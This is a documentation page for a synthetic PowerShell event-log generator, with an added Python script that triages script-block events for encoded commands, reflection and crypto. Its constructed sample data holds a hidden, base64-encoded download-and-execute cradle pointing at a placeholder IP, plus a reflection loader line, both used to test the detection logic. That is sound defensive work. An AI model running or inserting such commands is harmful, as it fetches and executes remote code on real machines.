Windows PowerShell
PowerShell classic ("Windows PowerShell") and operational (Microsoft-Windows-PowerShell/Operational) channels: engine lifecycle, script block logging, module invocations, pipeline execution, and provider starts. A share of the generated script blocks carry encoded/obfuscated commands and other suspicious script patterns so that detection content can be exercised against the output.
Quick Start
```shell
uv tool install eventum-generator
git clone https://github.com/eventum-generator/content-packs.git
cd content-packs
eventum generate \
  --path generators/windows-powershell/generator.yml \
  --id pslog \
  --live-mode true
```
Event Types
| Event ID | Channel | Description | Frequency | Category |
|---|---|---|---|---|
| 4104 | Microsoft-Windows-PowerShell/Operational | Script Block Logging (script block text created) | ~30% | process |
| 4103 | Microsoft-Windows-PowerShell/Operational | Module Logging (cmdlet invocation, pipeline executing) | ~30% | process |
| 400 | Windows PowerShell | Engine State: None → Available (engine start) | ~8% | process |
| 403 | Windows PowerShell | Engine State: Available → Stopped (engine stop) | ~8% | process |
| 600 | Windows PowerShell | Provider Started | ~8% | process |
| 800 | Windows PowerShell | Pipeline Execution Details | ~8% | process |
| 4105 | Microsoft-Windows-PowerShell/Operational | Script Block Invocation Start | ~4% | process |
| 4106 | Microsoft-Windows-PowerShell/Operational | Script Block Invocation Stop | ~4% | process |
Realism Features
- Session correlation — Engine start (400) produces sessions consumed by engine stop (403)
- Script block correlation — 4104 produces block IDs referenced by 4105/4106 invocation events
- ~15% of 4104 script blocks logged at Warning level, mirroring the engine's own suspicious-content check (encoded commands, reflection APIs, crypto); the rest are logged at Verbose level
- 30 cmdlets with realistic frequency weights (Get-Process, Get-Service dominate)
- Host application variety — powershell.exe (55%), pwsh.exe (20%), PSRemoting via wsmprovhost.exe (15%), ISE (10%)
- 120-host fleet with per-host record IDs and correlation pools
Sample Output
```json
{
  "@timestamp": "2026-02-22T17:04:03+00:00",
  "event": {
    "category": ["process"],
    "code": "4104",
    "kind": "event",
    "module": "powershell",
    "provider": "Microsoft-Windows-PowerShell"
  },
  "powershell": {
    "file": {
      "script_block_id": "948808fd-...",
      "script_block_text": "Restart-Service -Name Spooler -Force"
    }
  },
  "user": { "domain": "CONTOSO", "name": "mjohnson" },
  "winlog": {
    "channel": "Microsoft-Windows-PowerShell/Operational",
    "event_id": "4104"
  }
}
```
Parameters
| Parameter | Default | Description |
|---|---|---|
| domain | CONTOSO | Active Directory domain name |
| fqdn_suffix | contoso.local | FQDN suffix |
| domain_sid | S-1-5-21-3457937927-... | Domain SID prefix |
| agent_version | 8.17.0 | Winlogbeat version |
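Consuming the output

The generated stream is meant to be fed into detection logic. The Python script below is an added example, not part of this content pack or of Eventum itself. It parses NDJSON events in the shape shown under Sample Output, re-classifies each 4104 script block against the three Warning-level classes the pack emits (encoded commands, reflection APIs, crypto) instead of trusting any level field, decodes `-EncodedCommand` payloads (UTF-16LE base64), and checks the 4104 → 4105/4106 correlation by `script_block_id`, reporting invocation events whose block was never logged. It assumes that 4105/4106 events carry `powershell.file.script_block_id` the way 4104 events do (the page only says they reference the block ID); the regexes, the UUIDs, the hidden command and the sample events are constructed for the example and are not generator output.

```python
"""Triage synthetic PowerShell events (ECS/Winlogbeat shape) emitted by the generator.

Added example, not part of the content pack. Field names follow the Sample Output
section; the assumption that 4105/4106 carry powershell.file.script_block_id is ours.
"""
import base64
import json
import re
from collections import Counter, defaultdict

# Indicators for the pack's three Warning-level classes. The exact strings the
# generator emits are not published, so these regexes are an assumption.
SUSPICIOUS = {
    "encoded_command": re.compile(
        r"(?i)-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}|FromBase64String"),
    "reflection": re.compile(
        r"(?i)\[(?:System\.)?Reflection\.Assembly\]::Load|\.GetMethod\(|\.Invoke\("),
    "crypto": re.compile(
        r"(?i)Security\.Cryptography|Aes(?:Managed|CryptoServiceProvider)|RijndaelManaged"),
}
ENCODED_ARG = re.compile(r"(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})")


def classify(script_block_text: str) -> list[str]:
    """Return the names of every indicator class the script block text matches."""
    return [name for name, rx in SUSPICIOUS.items() if rx.search(script_block_text)]


def decode_encoded_command(script_block_text: str):
    """Decode the payload of -EncodedCommand/-enc/-e (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(script_block_text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not valid base64 / not UTF-16LE text
        return None


def triage(ndjson_lines):
    """Two passes: collect 4104 script blocks, then link 4105/4106 invocations to them."""
    events = [json.loads(line) for line in ndjson_lines if line.strip()]
    counts = Counter(ev["event"]["code"] for ev in events)
    blocks = {}
    for ev in events:
        if ev["event"]["code"] != "4104":
            continue
        f = ev["powershell"]["file"]
        text = f.get("script_block_text", "")
        blocks[f["script_block_id"]] = {
            "text": text,
            "flags": classify(text),
            "decoded": decode_encoded_command(text),
            "user": f"{ev['user']['domain']}\\{ev['user']['name']}",
        }
    invocations = defaultdict(list)   # block id -> invocation event codes, in order
    orphans = []                      # invocations whose 4104 never appeared
    for ev in events:
        if ev["event"]["code"] not in ("4105", "4106"):
            continue
        bid = ev.get("powershell", {}).get("file", {}).get("script_block_id")
        if bid in blocks:
            invocations[bid].append(ev["event"]["code"])
        else:
            orphans.append(bid)
    flagged = {bid: b for bid, b in blocks.items() if b["flags"]}
    return {
        "counts": counts,
        "flagged": flagged,
        "invocations": dict(invocations),
        "orphan_invocations": orphans,
        "executed_flagged": [bid for bid in flagged if bid in invocations],
    }


# --- Constructed sample stream (not generator output) --------------------------
BLOCK_BENIGN = "948808fd-1111-4111-8111-000000000001"
BLOCK_ENC = "948808fd-1111-4111-8111-000000000002"
BLOCK_REFL = "948808fd-1111-4111-8111-000000000003"
ORPHAN_ID = "deadbeef-1111-4111-8111-000000000009"
HIDDEN = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"


def _event(code, **file_fields):
    """Build one event in the Sample Output shape (constructed, fixed timestamp/user)."""
    ev = {"@timestamp": "2026-02-22T17:04:03+00:00",
          "event": {"category": ["process"], "code": code, "kind": "event",
                    "module": "powershell", "provider": "Microsoft-Windows-PowerShell"},
          "user": {"domain": "CONTOSO", "name": "mjohnson"},
          "winlog": {"channel": "Microsoft-Windows-PowerShell/Operational", "event_id": code}}
    if file_fields:
        ev["powershell"] = {"file": file_fields}
    return ev


SAMPLE_NDJSON = "\n".join(json.dumps(e) for e in [
    _event("4104", script_block_id=BLOCK_BENIGN,
           script_block_text="Restart-Service -Name Spooler -Force"),
    _event("4104", script_block_id=BLOCK_ENC,
           script_block_text="powershell.exe -NoP -W Hidden -Enc "
           + base64.b64encode(HIDDEN.encode("utf-16-le")).decode("ascii")),
    _event("4104", script_block_id=BLOCK_REFL,
           script_block_text="[System.Reflection.Assembly]::Load($bytes).GetType('Loader')"
                             ".GetMethod('Run').Invoke($null, $null)"),
    _event("4105", script_block_id=BLOCK_ENC),
    _event("4106", script_block_id=BLOCK_ENC),
    _event("4105", script_block_id=ORPHAN_ID),   # references a block that was never logged
    _event("4103"),
])

if __name__ == "__main__":
    result = triage(SAMPLE_NDJSON.splitlines())
    for bid, b in result["flagged"].items():
        print(bid, b["user"], b["flags"], b["decoded"] or b["text"])
    print("executed flagged blocks:", result["executed_flagged"])
    print("orphan invocations:", result["orphan_invocations"])
```

Pipe the generator's NDJSON into `triage()` line by line; the `executed_flagged` list is the one worth alerting on, since a suspicious 4104 that never reaches a 4105 was parsed but not run. Orphan invocations are expected in a real fleet whenever collection starts mid-session or 4104 events are dropped, so treat them as a data-quality signal rather than a detection.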
Related Generators
Windows Security Event Log
The Security channel of Windows Event Log — logon/logoff sessions, process creation, privilege escalation, account management, and audit policy changes from a 120-host Active Directory fleet.
Windows Sysmon
Sysmon (System Monitor) operational channel — process creation with full command lines, network connections, file creates, registry modifications, DNS queries, and WMI events. SwiftOnSecurity-style tuning.
Linux Auditd
Linux audit framework (auditd) — syscall tracing (execve, openat, connect), PAM authentication, credential changes, user login/logout, sudo privilege escalation, and systemd service management.